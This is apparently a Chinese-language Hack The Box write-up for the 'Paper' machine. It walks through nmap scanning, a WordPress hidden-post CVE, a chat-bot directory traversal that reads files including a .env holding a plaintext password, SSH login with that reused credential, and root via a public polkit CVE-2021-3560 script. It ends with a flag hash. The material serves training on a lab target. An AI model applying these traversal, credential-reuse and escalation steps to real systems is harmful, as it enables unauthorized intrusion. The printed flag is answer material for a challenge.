HTB-Paper

10.129.63.64    office.paper
ip='10.129.63.64'
ports=$(nmap -p- --min-rate=1000 -T4 $ip | grep ^[0-9] | cut -d '/' -f 1| tr '\n' ',' | sed s/,$//)
nmap -p$ports -sC -sV $ip

版本WordPress 5.2.3​

CVE-2019-17671

未授权访问隐藏post

/?static=1
/?static=1&order=asc #这里会404

看到个http://chat.office.paper/register/8qozr226AhkCHZdyY​

https://github.com/RocketChat/hubot-rocketchat

注册的时候用admin昵称提示被占用

这个机器人似乎可以命令注入？

找出路径了

recyclops file sale/portfolio.txt
<!=====Contents of file sale/portfolio.txt=====>
Portfolio
----------
- Bill
- Served the country in war
- Family built the country
- purchased paper worth a million dollars
- will probably fire me.
<!=====End of file sale/portfolio.txt=====>

直接目录穿越

之前etc不行是真的没权限访问

recyclops list ../
Fetching the directory listing of ../
total 32
drwx------ 11 dwight dwight 281 Feb 6 2022 .
drwxr-xr-x. 3 root root 20 Jan 14 2022 ..
lrwxrwxrwx 1 dwight dwight 9 Jul 3 2021 .bash_history -> /dev/null
-rw-r--r-- 1 dwight dwight 18 May 10 2019 .bash_logout
-rw-r--r-- 1 dwight dwight 141 May 10 2019 .bash_profile
-rw-r--r-- 1 dwight dwight 358 Jul 3 2021 .bashrc
-rwxr-xr-x 1 dwight dwight 1174 Sep 16 2021 bot_restart.sh
drwx------ 5 dwight dwight 56 Jul 3 2021 .config
-rw------- 1 dwight dwight 16 Jul 3 2021 .esd_auth
drwx------ 2 dwight dwight 44 Jul 3 2021 .gnupg
drwx------ 8 dwight dwight 4096 Sep 16 2021 hubot
-rw-rw-r-- 1 dwight dwight 18 Sep 16 2021 .hubot_history
drwx------ 3 dwight dwight 19 Jul 3 2021 .local
drwxr-xr-x 4 dwight dwight 39 Jul 3 2021 .mozilla
drwxrwxr-x 5 dwight dwight 83 Jul 3 2021 .npm
drwxr-xr-x 4 dwight dwight 32 Jul 3 2021 sales
drwx------ 2 dwight dwight 6 Sep 16 2021 .ssh
-r-------- 1 dwight dwight 33 Jul 30 11:04 user.txt
drwxr-xr-x 2 dwight dwight 24 Sep 16 2021 .vim

<!=====Contents of file ../bot_restart.sh=====>
#!/bin/bash

# Cleaning hubot's log so that it won't grow too large.
echo "" > /home/dwight/hubot/.hubot.log

# For starting the bot 20-ish (10+20) seconds late, when the server is restarted.
# This is because MongoDB and Rocket-Chat server needs some time to startup properly
sleep 10s

# Checks if Hubot is running every 10s
while [ 1 ];
do
sleep 20s
alive=$(/usr/sbin/ss -tulnp|grep 8000);
if [[ -n $alive ]]; then
err=$(grep -i 'unhandled-rejections=strict' /home/dwight/hubot/.hubot.log)
if [[ -n $err ]]; then
# Restarts bot
echo "[-] Bot not running! date";
#Killing the old process
pid=$(ps aux|grep -i 'hubot -a rocketchat'|grep -v grep|cut -d " " -f6);
kill -9 $pid;
cd /home/dwight/hubot;
# Cleaning hubot's log so that it won't grow too large.
echo "" > /home/dwight/hubot/.hubot.log
bash /home/dwight/hubot/start_bot.sh&
else

echo "[+] Bot running succesfully! date";
fi

else
# Restarts bot
echo "[-] Bot not running! date";
#Killing the old process
pid=$(ps aux|grep -i 'hubot -a rocketchat'|grep -v grep|cut -d " " -f6);
kill -9 $pid;
cd /home/dwight/hubot;
bash /home/dwight/hubot/start_bot.sh&
fi

done
<!=====End of file ../bot_restart.sh=====>

/home/dwight/hubot/start_bot.sh

<!=====Contents of file ../../../../../home/dwight/hubot/start_bot.sh=====>
#!/bin/bash
cd /home/dwight/hubot
source /home/dwight/hubot/.env
/home/dwight/hubot/bin/hubot
#cd -
<!=====End of file ../../../../../home/dwight/hubot/start_bot.sh=====>

​home/dwight/hubot/.env有账号密码

<!=====Contents of file ../../../../../home/dwight/hubot/.env=====>
export ROCKETCHAT_URL='http://127.0.0.1:48320'
export ROCKETCHAT_USER=recyclops
export ROCKETCHAT_PASSWORD=Queenofblad3s!23
export ROCKETCHAT_USESSL=false
export RESPOND_TO_DM=true
export RESPOND_TO_EDITED=true
export PORT=8000
export BIND_ADDRESS=127.0.0.1

但是不允许登web端

但passwd是可以读

有两个用户

rocketchat❌1001:1001::/home/rocketchat:/bin/bash
dwight❌1004:1004::/home/dwight:/bin/bash

直接拿密码去登ssh，用户在之前就已经暗示是dwight了

ssh dwight@10.129.63.64

pkexec提权

polkit版本为polkit-0.115-6.el8.x86_64，<0.119, pkexec的提权洞

https://github.com/secnigma/CVE-2021-3560-Polkit-Privilege-Esclation

./1.sh -p=pass123

不行就多试几次，一开始密码设置为admin还不行，用默认密码也没成功。成功一次之后无论用什么密码都行。

658a7b1b362501069febe4405316cc99